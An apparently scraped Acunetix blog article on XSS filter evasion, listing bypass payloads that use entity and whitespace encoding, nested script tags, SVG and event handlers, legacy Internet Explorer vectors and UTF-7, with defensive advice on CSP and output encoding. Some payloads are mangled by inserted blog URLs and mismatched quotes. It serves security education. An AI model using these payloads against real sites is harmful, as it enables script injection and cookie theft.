XSS Filter Evasion: How Attackers Bypass XSS Filters – And Why Filtering Alone Isn’t Enough

alert('Successful XSS');

Zero-Padded Entity Variations

HTML entity encoding allows 1 to 7 numeric characters, and leading zeros are ignored. This means each character can have multiple valid representations, making it harder for filters to catch all variations. For example, the < character alone has at least 70 valid encodings, as listed in the OWASP XSS Filter Evasion Cheat Sheet. Additionally, semicolons are not required at the end of entity codes, further complicating detection:

<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>

Here, j represents "j", : represents "X", and a represents "a", ultimately forming a valid javascript:alert() payload.

Character Codes for Concealed Script Execution

Instead of writing a script directly, attackers can use JavaScript’s String.fromCharCode() function to generate it dynamically, making detection harder:

<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>

In this example, String.fromCharCode(88,83,83) translates to “XSS”, triggering an alert when the mouse hovers over the iframe.

Why These Encoding Tricks Work

• Many filters only scan for specific patterns, such as javascript: or <script>, and fail to decode obfuscated payloads.
• Browsers automatically interpret encoded characters, reconstructing the malicious script before execution.
• Multiple encoding methods can be combined, making detection even more difficult.

These examples highlight the limitations of XSS filtering and reinforce why stronger security measures, such as Content Security Policy (CSP), proper input validation, and output encoding, are essential for preventing XSS attacks.

Using Whitespace to Evade XSS Filters

Browsers are highly tolerant of whitespace variations in HTML and JavaScript, allowing attackers to use non-printing characters to bypass basic XSS filters. While most modern browsers have hardened against these techniques, whitespace embedding can still work in certain contexts where filtering mechanisms fail to anticipate these variations.

Breaking Up Keywords with Tabs

Browsers ignore tab characters when parsing JavaScript, meaning an attacker can insert tabs within keywords to evade simple string-matching filters. For example, an <img> tag with an XSS payload can be obfuscated as follows (though this method is ineffective in most modern browsers):

<img src="https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/java script:al ert("Successful XSS')">

Alternatively, tabs can be encoded using hexadecimal representations to further obscure the payload:

<img src="java&#x09;script:al&#x09;ert('Successful XSS')">

Using Newlines and Carriage Returns

Similar to tabs, newline (\n, &#x0A;) and carriage return (\r, &#x0D;) characters are ignored when parsing JavaScript and HTML. Attackers can use these characters to split keywords, making detection more difficult:

<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')">Visit google.com</a>

In this case, the browser correctly interprets the encoded characters, reconstructing the javascript: payload before execution.

Using Whitespace and Special Characters to Evade Filters

Some XSS filters specifically look for “javascript:” or ‘javascript:’, assuming that there will be no unexpected whitespace or special characters. However, browsers allow any combination of spaces and non-printable characters (ASCII values 1-32 in decimal) before recognized keywords, making it possible to bypass such filters:

<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>

In this example:

• &#x8; (ASCII backspace) and &#23; (ASCII device control character) are inserted before javascript: to disrupt simple keyword detection.
• The browser still recognizes and executes the payload correctly.

Why These Techniques Work

• Many filtering systems check for exact matches of known attack patterns but fail to account for whitespace and encoding variations.
• Browsers automatically normalize and execute code, even when non-printable characters are inserted.
• Attackers can combine multiple evasion techniques, making it difficult to create a universal filter that blocks all variations.

These examples highlight the limitations of filter-based defenses and reinforce why secure input validation, output encoding, and Content Security Policies (CSPs) are necessary to properly mitigate XSS vulnerabilities.

Manipulating Tags to Evade XSS Filters

Attackers can exploit how browsers process and repair malformed HTML to bypass XSS filters that simply scan for and remove certain tags. By nesting, omitting spaces, or breaking syntax in unconventional ways, they can craft payloads that slip through basic filtering mechanisms while remaining executable in the browser.

Nesting Tags to Evade Simple Tag Removal

If an XSS filter detects and removes <script> tags in a single pass, attackers can nest them within other tags to ensure that valid executable code remains after filtering:

<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>

In this example, if a filter removes <script>, the remaining code reconstructs a valid <script> tag, allowing the JavaScript to execute.

Omitting Whitespace and Using Slashes as Separators

Browsers do not always require spaces between attributes, and some filters fail to account for alternative character placements. A forward slash (/) can act as a separator between the tag name and attributes, avoiding detection:

<img/src=”funny.jpg”onload=javascript:eval(alert(‘Successful&#32XSS’))>

This entirely whitespace-free payload still executes correctly in a browser, as it recognizes the onload attribute despite the unconventional formatting.

Using SVG Tags for XSS Execution

Because modern browsers support SVG (Scalable Vector Graphics), attackers can use SVG elements as an alternative to <script> tags. This allows script execution even in environments that block traditional script tags:

<svg/onload=alert('XSS')>

Even if certain characters are restricted, like parentheses or single quotes, attackers can replace them with backticks (`), which are still valid in JavaScript:

<svg/onload=alert`XSS`>

Exploiting Browser Auto-Correction of Malformed Tags

Web browsers are designed to fix broken HTML to ensure web pages display properly. Attackers can take advantage of this behavior to craft malformed elements that become valid after processing.

For example, omitting the href attribute and quotes in an <a> tag still allows an event handler to execute JavaScript:

<a onmouseover=alert(document.cookie)>Go to google.com</a>

Extreme Example: Breaking and Reconstructing an <img> Tag

By deliberately corrupting an <img> tag’s syntax, attackers can rely on the browser’s automatic correction mechanismsto repair the tag and execute a malicious script:

<img """><script src=xssattempt.js></script>">

Once interpreted by the browser, the misplaced attributes are ignored, and the <script> tag executes as intended.

Why These Techniques Work

• Filters that remove or block tags in a single pass may fail to prevent nested or reconstructed elements.
• Browsers attempt to correct malformed HTML, allowing attackers to craft broken but ultimately functionalpayloads.
• Alternative tag structures, such as SVG or event handler attributes, provide script execution pathways even in environments that block <script> tags.
• Filters that expect standard formatting can be bypassed by removing spaces, using alternative separators, or encoding characters differently.

These examples highlight the importance of context-aware input validation, secure output encoding, and the use of Content Security Policies (CSPs) to prevent XSS vulnerabilities, rather than relying on simple tag-based filtering alone.

Exploiting Internet Explorer’s Unique XSS Vulnerabilities

Before the dominance of Chrome and Firefox—and long before Microsoft Edge—Internet Explorer (IE) was the primary web browser. Due to its non-standard implementations and deep integration with other Microsoft technologies, IE introduced unique security quirks that attackers could exploit. While modern browsers have largely moved past these vulnerabilities, some legacy enterprise applications still rely on IE-specific features, making them relevant for certain attack scenarios.

VBScript Execution in Older Internet Explorer Versions

Most XSS filters are designed to block JavaScript-based payloads, but versions of Internet Explorer up to IE10 also supported VBScript, creating an alternative attack vector:

<a href="https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/vbscript:MsgBox("Successful XSS")">Click here</a>

Because VBScript execution was allowed in hyperlinks, attackers could trigger malicious actions through simple anchor tags.

CSS-Based Script Execution with Dynamic Properties

Internet Explorer introduced dynamic properties, which allowed CSS attributes to execute JavaScript expressions. This behavior provided an unusual XSS entry point via CSS:

body { color: expression(alert('Successful XSS')); }

Instead of acting as a pure styling rule, expression() could evaluate and execute arbitrary JavaScript when the affected CSS property was accessed.

Using the dynsrc Attribute for Script Execution

IE also supported the now-removed dynsrc attribute for images, which could be abused to execute JavaScript:

<img dynsrc="https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/javascript:alert("Successful XSS')">

Unlike standard <img> tags, which require properly formatted image sources, IE would process dynsrc as a valid JavaScript URL, triggering execution.

Bypassing Quote Restrictions with Backticks

If an application restricted both single (‘) and double (“) quotes, attackers could use backticks (`) instead, which Internet Explorer interpreted correctly in certain cases:

<img src=`javascript:alert("The name is 'XSS'")`>

Disguising a Script as an External Stylesheet

Older versions of Internet Explorer allowed scripts to be executed by embedding them in external CSS files. Attackers could exploit this by injecting malicious code into a .css file and referencing it in a <link> tag:

<link rel="stylesheet" href="http://example.com/xss.css">

If the external file contained JavaScript instead of CSS, some versions of IE would still execute the script, providing another method for delivering XSS payloads.

Why These Techniques Matter

While most of these IE-specific vulnerabilities have been eliminated in modern browsers, some legacy enterprise systems still rely on older versions of IE. Attackers targeting these environments can use these non-standard execution methods to bypass traditional XSS filters.

To properly mitigate these risks, security measures should include:

• Strict Content Security Policies (CSPs) to prevent execution of unauthorized scripts.
• Input validation and output encoding to block injection attempts at the application level.
• Eliminating reliance on outdated browsers and enforcing secure, modern alternatives.

Despite being historical quirks, these Internet Explorer exploits highlight how browser-specific behaviors can create unexpected security vulnerabilities.

A Look Back: Legacy XSS Exploits

As web technologies evolve, XSS filter bypass techniques quickly become outdated. However, looking at past exploits provides insight into the unintended edge cases that emerge when new specifications are introduced while maintaining backward compatibility. Below are some historical XSS techniques that may no longer work in modern browsers but highlight the creative methods attackers have used in the past.

Injecting JavaScript into Background Attributes

In older browsers, HTML attributes meant for styling could be used to execute JavaScript. For example, the background attribute on a <body> tag could trigger an XSS payload:

<body background="https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/javascript:alert("Successful XSS')">

A similar approach worked when using inline CSS properties, injecting JavaScript into a background-image property:

<div style="background-image:url(javascript:alert('Successful XSS'))">

Images as Script Execution Vectors

Some browsers allowed non-image content to be executed when loaded into an <img> or <input> field. Attackers could exploit this by using a JavaScript URL in an image source:

<input type="image" src="https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/javascript:alert("Successful XSS')">

Using <meta> Refresh for Script Injection

In some outdated browsers, the <meta> tag’s refresh attribute could be abused to redirect the page to a Base64-encoded JavaScript payload, leading to execution:

<meta http-equiv="refresh" content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

Here, the Base64-encoded string decodes into:

<script>alert('XSS')</script>

This technique worked because some browsers automatically decoded and executed Base64-encoded content as part of a page load.

UTF-7 Encoding: A Forgotten XSS Attack

At one point, it was possible to hide XSS payloads using UTF-7 encoding, a character encoding format that some browsers supported:

<head><meta http-equiv="content-type" content="text/html; charset=utf-7"></head>

+adw-script+ad4-alert('xss');+adw-/script+ad4-

In this example:

• The <meta> tag declares that the page uses UTF-7 encoding instead of the more common UTF-8.
• The XSS payload is encoded using UTF-7 notation, where +adw- represents < and +ad4- represents >.
• Some browsers automatically interpreted and executed this encoded JavaScript, allowing for successful exploitation.

Why These Methods Matter

While these specific techniques no longer work in modern browsers, they illustrate how small quirks in web technology can lead to major security issues. Attackers continually look for unexpected behaviors in browsers and web standards, which is why XSS prevention must go beyond filtering and include:

• Proper input validation and output encoding to neutralize potential attack vectors.
• Content Security Policies (CSPs) to restrict script execution sources.
• Regular security updates to prevent exploitation of older browser features.

Even though these methods are historical artifacts, they serve as a reminder that security must evolve alongside web technologies to prevent future XSS vulnerabilities.

How to Protect Your Applications from XSS – Beyond Filtering

While web application firewalls (WAFs) can provide some level of XSS filtering, they should only be considered one layer of a broader security strategy. With hundreds of known filter bypass techniques and new attack methods constantly emerging, filtering alone is not a reliable defense. Additionally, aggressive filtering can interfere with legitimate scripts, which is one of the reasons browser vendors are moving away from built-in XSS filtering.

Building Secure Applications to Prevent XSS

The most effective way to protect against cross-site scripting (XSS) is to write secure, well-structured code that prevents vulnerabilities at the source. Instead of relying on filters, developers should:

• Treat all user input as untrusted by default, ensuring strict validation and sanitization.
• Apply context-aware escaping and encoding, making sure that user-controlled data cannot be interpreted as executable code.
• Enforce security at the HTTP level by implementing Content Security Policy (CSP) headers and other essential HTTP security headers to restrict script execution.

Continuous Testing for XSS Prevention

Even with secure coding practices in place, applications must be regularly tested to ensure that new features, updates, or configuration changes do not introduce XSS vulnerabilities. A robust web vulnerability scanning process should be integrated into development workflows, allowing for continuous security monitoring and automated detection of misconfigurations and vulnerabilities.

By prioritizing secure development practices, proper security headers, and ongoing vulnerability assessments, developers can effectively mitigate XSS threats without relying on filtering alone.

THE AUTHOR

Acunetix

Acunetix developers and tech agents regularly contribute to the blog. All the Acunetix developers come with years of experience in the web security sphere.